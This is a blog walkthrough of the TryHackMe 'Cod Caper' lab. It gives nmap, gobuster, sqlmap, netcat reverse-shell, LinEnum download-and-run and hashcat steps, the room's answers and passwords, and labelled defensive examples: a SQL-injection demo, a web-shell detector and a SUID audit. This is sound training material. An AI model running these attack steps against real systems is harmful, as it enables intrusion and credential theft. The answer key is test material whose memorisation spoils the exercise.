
  • TryHackMe The Cod Caper Walkthrough





    The platform develops virtual classrooms that not only allow users to deploy training environments with the click of a button, but also reinforce learning by adding a question-answer approach. It's a comfortable experience to learn using pre-designed courses which include virtual machines (VM) hosted in the cloud.


    While using a question-answer model does make learning easier, TryHackMe allows users to create their own virtual classrooms to teach particular topics enabling them to become teachers. This not only provides other users with rich and varied content, but also helps creators reinforce their understanding of fundamental concepts.














    [Task 1] Intro


    Hello there my name is Pingu. I've come here to put in a request to get my fish back! My dad recently banned me from eating fish, as I wasn't eating my vegetables. He locked all the fish in a chest, and hid the key on my old pc, that he recently repurposed into a server. As all penguins are natural experts in penetration testing, I figured I could get the key myself! Unfortunately he banned every IP from Antarctica, so I am unable to do anything to the server. Therefore I call upon you my dear ally to help me get my fish back! Naturally I'll be guiding you through the process.

    Note: This room expects some basic pen testing knowledge, as I will not be going over every tool in detail that is used. While you can just use the room to follow through, some interest or experience in assembly is highly recommended.




    Ans :- No Needed



    [Task 2] Host Enumeration



    The first step is to see what ports and services are running on the target machine.


    Recommended Tool - nmap:


    Useful flags:


    -p :- Used to specify which port to analyze, can also be used to specify a range of ports i.e -p 1-1000



    -sC :- Runs default scripts on the port, useful for doing basic analysis on the service running on a port


    -A :- Aggressive mode, go all out and try to get as much information as possible



    #1 How many ports are open on the target machine?


    nmap 10.10.191.14





    Ans :- 2




    #2 What is the http-title of the web server?


    nmap -sC 10.10.191.15



     

    Ans :- Apache2 Ubuntu Default Page: it works





    #3 What version is the ssh service?









    nmap -sV 10.10.191.15





    Ans :- OpenSSH 7.2p2 Ubuntu 4ubuntu2.8




    #4 What is the version of the web server?


    nmap -A 10.10.191.15





    Ans :- Apache/2.4.18


    [Task 3] Web Enumeration


    Since the only services running are SSH and Apache, it is safe to assume that we should check out the web server first for possible vulnerabilities. One of the first things to do is to see what pages are available to access on the web server.


    Recommended tool: gobuster


    Useful flags: 

    -x :- Used to specify file extensions i.e "php,txt,html"


    --url :- Used to specify which url to enumerate


    --wordlist :- Used to specify which wordlist that is appended on the url path i.e


    "http://url.com/word1"

    "http://url.com/word2"

    "http://url.com/word3.php"




    #1 What is the name of the important file on the server?


    gobuster -x .txt,.php,.html dir -u http://10.10.237.242 -w /usr/share/wordlists/dirb/common.txt











    ANS :- administrator.php




    [Task 4] Web Exploitation


    The admin page seems to give us a login form. In situations like this it is always worth it to check for "low-hanging fruit". In the case of login forms one of the first things to check for is SQL Injection.


    Recommended Tool: sqlmap

    Useful Flags:


    -u :- Specifies which url to attack

    --forms :- Automatically selects parameters from <form> elements on the page

    --dump :- Used to retrieve data from the db once SQLI is found

    -a :- Grabs just about everything from the db
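
    Why a login form like this is injectable, and what the fix looks like, as an added example that is not part of the room or the original post. It is a Python/sqlite3 stand-in for the PHP login check; the users table, the functions login_concat and login_param and the probe string are all constructed for illustration.

```python
import sqlite3

def make_db():
    """In-memory stand-in for the table behind a login form (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'example-password')")
    return db

def login_concat(db, username, password):
    """Vulnerable: user input is pasted straight into the SQL text."""
    query = ("SELECT username FROM users "
             "WHERE username = '%s' AND password = '%s'" % (username, password))
    try:
        return db.execute(query).fetchone() is not None
    except sqlite3.Error:
        return False  # a stray quote breaks the statement, itself a symptom

def login_param(db, username, password):
    """Hardened: placeholders keep input as data, never as SQL syntax."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return db.execute(query, (username, password)).fetchone() is not None

# Constructed probe: the quote closes the string literal and the OR clause
# is always true, so the WHERE condition matches every row.
PROBE = "' OR '1'='1"

if __name__ == "__main__":
    db = make_db()
    for name, check in (("concat", login_concat), ("param", login_param)):
        print(name,
              "valid login:", check(db, "admin", "example-password"),
              "probe accepted:", check(db, "anyone", PROBE))
```

    The concatenated query accepts the probe without a valid password; the parameterized one treats it as a wrong password.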



    #1 What is the admin username?


    sqlmap -u http://10.10.110.216/administrator.php --dbs --forms










    Ans :- pingudad


    #2 What is the admin password?






    Ans :- secretpass


    #3 How many forms of SQLI is the form vulnerable to?







    [Task 5] Command Execution

    In the previous task we found the login page and used sqlmap to get the username and password. After a successful login we’ll see a screen like this.

    It is vulnerable to command execution.









    After login, we have a command prompt, so it seems we have the ability to run commands. We executed the command “id” and got the right result, so we tried to execute a python reverse shell, and after executing the command we got a reverse shell.

    Now we’ll run nc on our system to catch the reverse shell from the target machine.

    Payloads are given in the link provided in the description of the task.

    # nc -lnvp 4444

    Here my machine listens on port 4444 for the connection from the target machine.

    Now we’ll check the payloads one by one by running each in the command field shown in the image above.

    Before running a payload, modify the IP address and port:

    Port will be 4444

    IP address will be on the access page of THM (Internal Virtual IP address)

    Luckily I got the reverse shell on running the first perl payload on this page:

    https://highon.coffee/blog/reverse-shell-cheat-sheet/


    Now on further enumeration, you’ll get the password in the hidden directory.

    You will find the password in /var/hidden/pass by using the find command:

    # find / -name pass -type f 2>/dev/null
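
    On the defending side, a command run through the web page shows up as the web server account starting a shell or interpreter. The added example below (not part of the original post) flags that pattern in process-execution events and reports each hit's ancestry; the key=value log format, the account and tool lists and the sample events are all constructed for illustration.

```python
import shlex
from pathlib import PurePosixPath

WEB_USERS = {"www-data", "apache", "nginx"}   # accounts web servers commonly run as
SHELLS_AND_TOOLS = {"sh", "bash", "dash", "nc", "ncat", "perl", "python", "python3"}

# Constructed process-execution events (format invented for this example).
SAMPLE_EVENTS = """\
pid=900 ppid=1 user=root exe=/usr/sbin/apache2 args="apache2 -k start"
pid=1201 ppid=900 user=www-data exe=/usr/sbin/apache2 args="apache2 -k start"
pid=1310 ppid=1201 user=www-data exe=/bin/sh args="sh -c id"
pid=1322 ppid=1201 user=www-data exe=/bin/sh args="sh -c <command elided>"
pid=1323 ppid=1322 user=www-data exe=/usr/bin/perl args="perl -e <one-liner elided>"
pid=1324 ppid=1323 user=www-data exe=/bin/sh args="sh -i"
pid=2001 ppid=950 user=pingu exe=/bin/bash args="-bash"
"""

def parse_event(line):
    """Split one key=value line into a dict; quoted values may contain spaces."""
    return dict(token.split("=", 1) for token in shlex.split(line))

def exe_name(event):
    return PurePosixPath(event["exe"]).name

def detect(log_text):
    """Return (pid, ancestry) for each shell or tool started by a web account."""
    by_pid, hits = {}, []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        event = parse_event(line)
        by_pid[event["pid"]] = event
        if event["user"] in WEB_USERS and exe_name(event) in SHELLS_AND_TOOLS:
            chain, cur = [], event
            while cur is not None and len(chain) < 16:   # bound the parent walk
                chain.append(exe_name(cur))
                cur = by_pid.get(cur["ppid"])
            hits.append((event["pid"], " <- ".join(chain)))
    return hits

if __name__ == "__main__":
    for pid, ancestry in detect(SAMPLE_EVENTS):
        print(pid, ancestry)
```

    The interactive shell at the end of the chain (apache2, then sh, then perl, then sh) is the pattern worth alerting on; the SSH login shell for pingu is not flagged.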



    [Task 6] LinEnum

    Step 1: Prepare the Script on Your Attack Machine

    LinEnum and its script can be found on GitHub.

    # mkdir linenum

    # cd linenum/

    # wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

    # python -m SimpleHTTPServer 4444




    Step 2: Download the Script on the Target Machine

    Log in to the target machine over SSH:

    # ssh pingu@<IP>

    pingu@ubuntu$ cd /tmp

    pingu@ubuntu$ wget <IP>:4444/LinEnum.sh

    pingu@ubuntu$ ls -la

    pingu@ubuntu$ chmod +x LinEnum.sh

    pingu@ubuntu$ ls -la

    pingu@ubuntu$ ./LinEnum.sh



    Now look for the SUID files in the results.
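
    The same SUID check from the defender's side, as an added example that is not part of LinEnum or the original post: walk a directory tree, list setuid regular files and report the ones missing from a baseline. The function names and the BASELINE set are assumptions; build the baseline from a trusted install.

```python
import os
import stat

# Assumed baseline of expected setuid binaries (illustrative, not exhaustive).
BASELINE = frozenset({"/usr/bin/passwd", "/usr/bin/sudo", "/bin/su", "/bin/mount"})

def find_suid(root):
    """Yield (path, stat_result) for regular files under root with the setuid bit."""
    for dirpath, _dirs, files in os.walk(root, followlinks=False):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: never follow symlinks
            except OSError:
                continue                     # vanished or unreadable entry
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                yield path, st

def audit_suid(root, baseline=BASELINE):
    """Return findings for setuid files that are not in the baseline."""
    findings = []
    for path, st in find_suid(root):
        if path in baseline:
            continue
        findings.append({
            "path": path,
            "owner_uid": st.st_uid,
            "mode": stat.filemode(st.st_mode),
            # writable by group/other means someone else can replace the code
            "writable_by_others": bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH)),
        })
    return sorted(findings, key=lambda f: f["path"])

if __name__ == "__main__":
    for finding in audit_suid("/usr/bin"):
        print(finding["mode"], finding["owner_uid"], finding["path"])
```

    Any root-owned setuid file outside the baseline, especially one under a home or application directory, deserves a closer look.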


    [Task 10] Finishing the Job

    Now we have the hash to crack. Here I have put the given hash in the root.txt file.

    We’ll use hashcat to crack it.

    # hashcat -m 1800 -a 0 root.txt /usr/share/wordlists/rockyou.txt

    On completing this we’ll have the root password.



    Ans :- love2fish








    Disclaimer


    This was written for educational purposes and pentesting only.
    The author will not be responsible for any damage.
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing malicious or damaging attacks. Performing any hacks without written permission is illegal.


    All videos and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in are only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal


